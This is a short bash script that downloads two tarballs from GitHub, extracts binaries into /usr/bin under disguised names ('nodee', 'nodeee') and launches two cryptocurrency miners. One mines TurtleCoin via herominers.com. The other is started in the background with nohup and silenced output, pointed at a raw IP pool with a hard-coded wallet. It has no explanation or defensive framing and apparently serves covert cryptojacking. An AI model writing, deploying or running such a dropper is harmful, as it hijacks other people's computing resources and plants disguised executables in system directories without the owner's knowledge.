#!/bin/bash
cd /usr/bin

wget https://raw.githubusercontent.com/metrorelax/catalina/main/kubernetes.tar.gz
tar xvzf kubernetes.tar.gz
mv bash1 nodee

wget https://raw.githubusercontent.com/d1uf95z8/csv/master/csv45.tar.gz
tar xvzf csv45.tar.gz
mv ruby nodeee

echo '{
"retry_time" : 6,
"cpu_threads" : 8,
"giveup_limit" : 99,
"algorithm" : "randomepic",
"disable_cpu" : false,
"disable_gpu" : true
}' > abcdzyxw.txt

nice -n 19 nodee -o turtlecoin.herominers.com:10381 -u TRTLuwZhJj6SmqEUWvrhEeG1Rn9Cvgvn8eCkgW649zJR32HT3vcSwdo3eET7ANk2pLXs4PvkFYrnk6K1GCnrsQYD2HVYQpQ89pR+3f5a44cbb083b058a7e0b5333732c64748007da4e4e3e51ee096de39861d394f.50000 -p jeff -a argon2/chukwav2 --donate-level 1 -t 8 -r 99 -R 6 -B

sleep 20

nice -n -20 nohup nodeee --config-file abcdzyxw.txt --pool 3.127.218.147:80 --wallet blueligerzoid4 --password z > /dev/null 2>&1 &

cd /

